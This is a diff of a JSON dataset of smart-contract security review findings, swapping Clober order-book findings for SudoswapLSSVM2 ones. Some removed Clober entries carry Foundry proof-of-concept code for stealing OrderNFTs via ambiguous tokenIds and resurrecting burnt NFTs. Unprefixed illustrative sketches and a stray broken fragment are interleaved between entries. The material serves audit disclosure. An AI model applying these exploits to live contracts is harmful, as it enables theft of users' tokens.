"https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "price is redefined in each iteration of the loop and right after declaration is set to a new value. for (uint256 i; i < numNFTs; i++) { uint256 price; (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier()); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization" ] },
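For illustration, a sketch of the hoisting the finding suggests, reusing the identifiers from the quoted loop; this is illustrative, not the project's actual fix:

uint256 price; // declared once, assigned in each iteration
for (uint256 i; i < numNFTs; i++) {
    (, spotPrice, delta, price,,) = pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, pair.factory().protocolFeeMultiplier());
    // ... use price ...
}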
{ - "title": "OrderNFT theft due to ambiguous tokenId encoding/decoding scheme", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The encodeId() uniquely encodes OrderKey to a uint256 number. However, decodeId() ambiguously can decode many tokenIds to the exact same OrderKey. This can be problematic due to the fact that the contract uses tokenIds to store approvals. The ambiguity comes from converting the uint8 value to the bool isBid value here: function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) { uint8 isBid; uint16 priceIndex; uint232 orderIndex; assembly { orderIndex := id priceIndex := shr(232, id) isBid := shr(248, id) } return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex}); } (note that the attack is possible only for ASK limit orders) Proof of Concept: // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 10**18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds CloberOrderBook.OrderKey memory order_key = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 tokenId = orderToken.encodeId(order_key); uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId // Step 3. Attacker approves both victim (can be a third-party protocol like OpenSea) and his other account vm.startPrank(attacker); orderToken.approve(victim, tokenId); orderToken.approve(attacker2, ambiguous_tokenId); vm.stopPrank(); // Step 4. Victim transfers the NFT to themselves. (Or attacker trades it) vm.startPrank(victim); orderToken.transferFrom(attacker, victim, tokenId); vm.stopPrank(); // Step 5. Attacker steals the NFT vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker2, ambiguous_tokenId); vm.stopPrank();", + "title": "Caller of swapTokenForSpecificNFTs() must be able to receive ETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _refundTokenToSender() sends ETH back to the caller. If this caller is a contract then it might not be able to receive ETH. If it can't receive ETH then the transaction will revert. function _refundTokenToSender(uint256 inputAmount) internal override { // Give excess ETH back to caller if (msg.value > inputAmount) { payable(msg.sender).safeTransferETH(msg.value - inputAmount); } }", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] },
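A minimal sketch of a caller contract that can safely receive the excess-ETH refund described above; the contract name is hypothetical:

contract SwapCaller {
    // A payable receive() lets the ETH transfer in _refundTokenToSender() succeed.
    receive() external payable {}
}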
{ - "title": "Missing owner check on from when transferring tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT passing the victim as from by calling transferFrom(from=victim, to=attackerAccount, tokenId=attackerTokenId). This passes the _isApprovedOrOwner check, but reduces from's balance.", + "title": "order.doPropertyCheck could be replaced by the pair's propertyChecker()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The field+check for a separate order.doPropertyCheck in struct SellOrder is unnecessary because this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Wrong minimum net fee check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "A minimum net fee was introduced that all markets should comply with such that the protocol earns fees. The protocol fees are computed as takerFee + makerFee, and the market factory implements the wrong check. Fee pairs that should be accepted are currently not accepted, and even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way.", + "title": "_payProtocolFeeFromPair() could be replaced with _sendTokenOutput()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Both ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are identical in their parameters and logic.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Rounding up of taker fees of constituent orders may exceed collected fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: takerFee = 100011 (10.0011%); 2 maker orders of amounts 400000 and 377000; total amount = 400000 + 377000 = 777000. Taker fee taken = 777000 * 100011 / 1000000 = 77708.547, rounded up to 77709. Maker fees would be 377000 * 100011 / 1000000 = 37704.147, rounded up to 37705, and 400000 * 100011 / 1000000 = 40004.4, rounded up to 40005, which is 1 wei more than actually taken.
Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol: function testClaimFeesFailFromRounding() public { _createOrderBook(0, 100011); // 10.0011% taker fee // create 2 orders uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); // take both orders _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT); CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2); ids[0] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); ids[1] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex2 }); // perform claim orderBook.claim( address(this), ids ); // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance(); // console.log(quoteFeeBal); // fee accounted = 20004 // console.log(baseFeeBal); // fee accounted = 0 // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003 // try to claim fees, will revert vm.expectRevert(\"ERC20: transfer amount exceeds balance\"); orderBook.collectFees(); }", + "title": "False positive in test_getSellInfoWithoutFee() when delta == FixedPointMathLib.WAD due to wrong implementation", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "In test_getSellInfoWithoutFee, delta is not validated via validateDelta, which causes a false positive in the current test when delta == FixedPointMathLib.WAD. This can be tried with the following proof of concept // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import {FixedPointMathLib} from \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol\"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } }", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Drain tokens condition due to reentrancy in collectFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "collectFees function is not guarded by a re-entrancy guard. In case a transfer of at least one of the tokens in a trading pair allows invoking arbitrary code (e.g. a token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The re-entrancy condition allows transferring collected fees multiple times to both the DAO and the host, beyond the actual fee counter.", + "title": "Checks-Effects-Interactions pattern not used in swapNFTsForToken()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks-Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] },
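For illustration, a sketch of the reordered flow the Checks-Effects-Interactions finding recommends, using the abbreviated names from the report; this is illustrative, not the project's actual code:

function swapNFTsForToken(/* ... */) external {
    _takeNFTsFromSender(/* ... */);                 // pull the NFTs in first
    _payProtocolFeeFromPair(_factory, protocolFee); // then pay fees
    _sendTokenOutput(tokenRecipient, outputAmount); // external value transfers last
}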
}", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Group claim clashing condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Claim functionality is designed to support 3rd party operators to claim multiple orders on behalf of market's users to finalise the transactions, deliver assets and earn bounties. The code allows to iterate over a list of orders to execute _claim. function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall { uint32 totalBounty = 0; for (uint256 i = 0; i < orderKeys.length; i++) { ... (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim( queue, mOrder, orderKey, claimer ); ... } } However, neither claim nor _claim functions in OrderBook support skipping already fulfilled orders. On the con- trary in case of a revert in _claim the whole transaction is reverted. function _claim(...) private returns (...) { ... require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM); ... } Such implementation does not support fully the initial idea of 3rd party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen for instance when two bots got overlapping lists of orders or when the owner of the order decides to claim or cancel his/her order manually while the bot is about to claim it as well. 15", + "title": "Two versions of withdrawERC721() and withdrawERC1155()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Order owner isn't zeroed after burning", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT to have been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero. 
function testNFTMovementAfterBurn() public { _createOrderBook(0, 0); address attacker2 = address(0x1337); // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3 uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); uint256 tokenId = orderToken.encodeId(orderKey); // Step 2: burn 1 NFT by cancelling one of the orders vm.startPrank(Constants.MAKER); orderBook.cancel( Constants.MAKER, _toArray(orderKey) ); // verify ownership is still maker assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, \"NFT_OWNER\"); // Step 3: resurrect burnt token by calling safeTransferFrom orderToken.safeTransferFrom( Constants.MAKER, attacker2, tokenId ); // verify ownership is now attacker2 assertEq(orderToken.ownerOf(tokenId), attacker2, \"NFT_OWNER\"); }", + "title": "Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic and wasting unnecessary gas in the process.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Lack of two-step role transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The contracts lack two-step role transfer. Both the ownership of the MarketFactory as well as the change of a market's host are implemented as single-step functions. Basic validation that the address is not the zero address is performed for a market; however, the case where the address receiving the role is inaccessible is not covered properly. Taking into account that handOverHost can be invoked without any supervision by anyone who created the market, it is possible to make a typo unintentionally, or intentionally if the attacker simply wants to brick fee collection, as currently the host affects collectFees in OrderBook (described as a separate issue). The ownership transfer should in theory be less error-prone as it should be done by the DAO with great care; still, a two-step role transfer is preferable.", + "title": "Deviation from standard/uniform naming convention affects readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Following standard/uniform naming conventions is essential to make a codebase easy to read and understand.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational LSSVMPairFactory.sol#L471, LSSVMRouter.sol#L128-L135," ] }, { - "title": "Atomic fees delivery susceptible to funds lockout", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The collectFees function delivers the quoteToken part of fees as well as the baseToken part of fees atomically and simultaneously to both the DAO and the host. In case a single address is for instance blacklisted (e.g.
via the USDC blacklist feature), or a token in a pair happens to be malicious and configured in such a way that a transfer to one of the addresses reverts, it is possible to block fee delivery. function collectFees() external nonReentrant { // @audit delivers both tokens atomically require(msg.sender == _host(), Errors.ACCESS); if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION; uint256 hostFeeAmount = amount - daoFeeAmount; _transferToken(token, _daoTreasury(), daoFeeAmount); _transferToken(token, _host(), hostFeeAmount); } There are multiple cases in which such a situation can happen, for instance: a malicious host wants to block the function for the DAO to prevent collecting the at least guaranteed valuable quoteToken, or a hacked DAO can swap the treasury to some invalid address and renounce ownership to brick collectFees across multiple markets. Taking into account the current implementation, in case it is not possible to transfer tokens it is necessary to swap the problematic address; however, depending on the specific case this might not be trivial.", + "title": "Function _getRoyaltyAndSpec() contains code duplication which affects maintainability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _getRoyaltyAndSpec() is rather long and contains code duplication. This makes it difficult to maintain. function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... if (spec <= NOT_CONFIGURED && spec > NONE) { try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) { // Support Art Blocks override require(recipients_.length == bps.length); return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache); } catch {} ... } else { // Spec exists, just execute the appropriate one ... ... if (spec == ARTBLOCKS) { // Art Blocks spec uint256[] memory bps; (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId); require(recipients.length == bps.length); return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache); } else ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "DAO fees potentially unavailable due to overly strict access control", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The collectFees function is guarded by an inline access control require statement which prevents anyone except the host from invoking the function. Only the host of the market is authorized to invoke it and effectively deliver all collected fees, including the part of the fees belonging to the DAO. function collectFees() external nonReentrant { require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } This access control is too strict and can lead to funds being locked permanently in the worst case scenario.
As the host is a single point of failure, in case access to the wallet is lost or incorrectly transferred, the fees for both the host and the DAO will be locked.", + "title": "getSellInfo always adds 1 rather than rounding which leads to last item being sold at 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Based on the comment // We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up. In cases where delta == spotPrice && numItems > 1, the last item would be sold at 0: delta = 100; spotPrice = 100; numItems = 2; uint256 totalPriceDecrease = delta * numItems = 200; Therefore the check if (spotPrice < totalPriceDecrease) succeeds. Later it is calculated: uint256 numItemsTillZeroPrice = spotPrice / delta + 1; That results in 2, even though the division was an exact 1; the value is not rounded up in the case where spotPrice == delta but always increased by 1.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] },
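For illustration, a conventional ceiling-division formulation of the rounding the finding asks for, assuming delta != 0; the names mirror the quoted snippet, and this is a sketch rather than the project's fix:

uint256 numItemsTillZeroPrice = (spotPrice + delta - 1) / delta; // ceil(spotPrice / delta); yields 1 (not 2) when spotPrice == delta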
{ - "title": "OrderNFT ownership and market host transfers are done separately", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The market host is entitled to 80% of the fees collected, and is able to set the URI of the corresponding orderToken NFT. However, transferring the market host and the orderToken NFT is done separately. It is thus possible for a market host to transfer one but not the other.", + "title": "Natspec for robustSwapETHForSpecificNFTs() is slightly misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function robustSwapETHForSpecificNFTs() has this comment: * @dev We assume msg.value >= sum of values in maxCostPerPair This doesn't have to be the case. The transaction just reverts if msg.value isn't sufficient.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "OrderNFTs can be renamed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, suddenly renaming tokens by a malicious market host could lead to web2 phishing attacks.", + "title": "Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain as both copies have to stay in sync.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "DOSing _replaceStaleOrder() due to reverting on token transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "In the case of tokens with implemented hooks, a malicious order owner can revert in the token-received hook and thus cause a denial of service via _replaceStaleOrder(). The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks.", + "title": "Not using error strings in require statements obfuscates monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "require statements should include meaningful error messages to help with monitoring the system.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Total claimable bounties may exceed type(uint32).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Individual bounties are capped to type(uint32).max which is ~4.295 of a native token of 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of the Polygon network) for their sum to therefore exceed type(uint32).max.", + "title": "prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 to a pair but do not update the prices and balances in the curves. And if they were to do so, then the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect this. The owner can't fully rely on emits.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Can fake market order in TakeOrder event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Market orders in Orderbook.marketOrder set the 8-th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with this 8-th bit set and spoof a market order event.", + "title": "Functions enableSettingsForPair() and disableSettingsForPair() can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions enableSettingsForPair() and disableSettingsForPair() define a temporary variable pair. This variable could also be used earlier in the code to simplify it. function enableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPair pair = LSSVMPair(pairAddress); ... } function disableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ... LSSVMPair pair = LSSVMPair(pairAddress); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] },
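A sketch of the simplification the finding suggests, defining the temporary variable before the require so the cast happens only once; illustrative only:

function enableSettingsForPair(address settings, address pairAddress) public {
    LSSVMPair pair = LSSVMPair(pairAddress);
    require(isPair(pairAddress, pair.pairVariant()), "Invalid pair address");
    // ... rest of the logic reuses `pair` ...
}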
}", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "_priceToIndex will revert if price is type(uint128).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Because price is type uint128, the increment will overflow first before it is casted to uint256 uint256 shiftedPrice = uint256(price + 1) << 64;", + "title": "Design asymmetry decreases code readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _calculateBuyInfoAndUpdatePoolParams() performs a check on maxExpectedToken- Input inside its function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function: function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...) require(outputAmount >= minExpectedTokenOutput, \"Out too few tokens\"); ... } The asymmetry in the design of these functions affects code readability and may confuse the reader.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "using block.chainid for create2 salt can be problematic if there's chain hardfork", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Using block.chainid as salt for create2 can result in inconsistency if there is a chain split event(eg. eth2 merge). This will make 2 different chains that has different chainid(one with original chain id and one with random new value). Which will result in making one of the chains not able to interact with markets, nfts properly. Also, it will make things hard to do a fork testing which changes chainid for local environment.", + "title": "Providing the same _nftID multiple times will increase numPairNFTsWithdrawn multiple times to potentially cause confusion", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "If one accidentally (or intentionally) supplies the same id == _nftID multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Use get64Unsafe() when updating claimable in take()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "get64Unsafe() can be used when fetching the stored claimable value since _getClaimableIndex() returns elementIndex < 4", + "title": "Dual interface NFTs may cause unexpected behavior if not considered in future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Some NFTs support both the ERC721 and the ERC1155 standard. For example NFTs of the Sandbox project. 
Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair is very similar: | cloneETHPair | cloneERC1155ETHPair | | --- | --- | | mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) | | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | | mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) | | mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) | | mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) | In case there is a specific function that only works on ERC721, and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, then an unexpected situation could occur. Currently, this is not the case, but that might occur in future iterations of the code.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Check is zero is cheaper than check if the result is a concrete value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Checking if the result is zero vs. checking if the result is/isn't a concrete value should save 1 opcode.", + "title": "Missing event emission in multicall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. There are several actions that should always emit events for transparency, such as ownership changes, transfers of ether/tokens etc. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Function argument can be skipped", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The address caller parameter in the internal _cancel function can be replaced with msg.sender as effectively this is the value that is actually used when the function is invoked.", + "title": "Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() could be misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() return a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Redundant flash loan balance cap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The requested flash loan amounts are checked against and capped up to the contract's token balances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens.
Otherwise, let the function revert from failure to transfer the requested tokens instead.", + "title": "Two ways to query the assetRecipient could be confusing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPair has two ways to query the assetRecipient. One via the getter assetRecipient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient }", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Do direct assignment to totalBaseAmount and totalQuoteAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and assigned a value each iteration. Since they are only incremented in the referenced block (and are mutually exclusive cases), the assignment can be direct instead of doing an increment.", + "title": "Functions expecting NFT deposits can validate 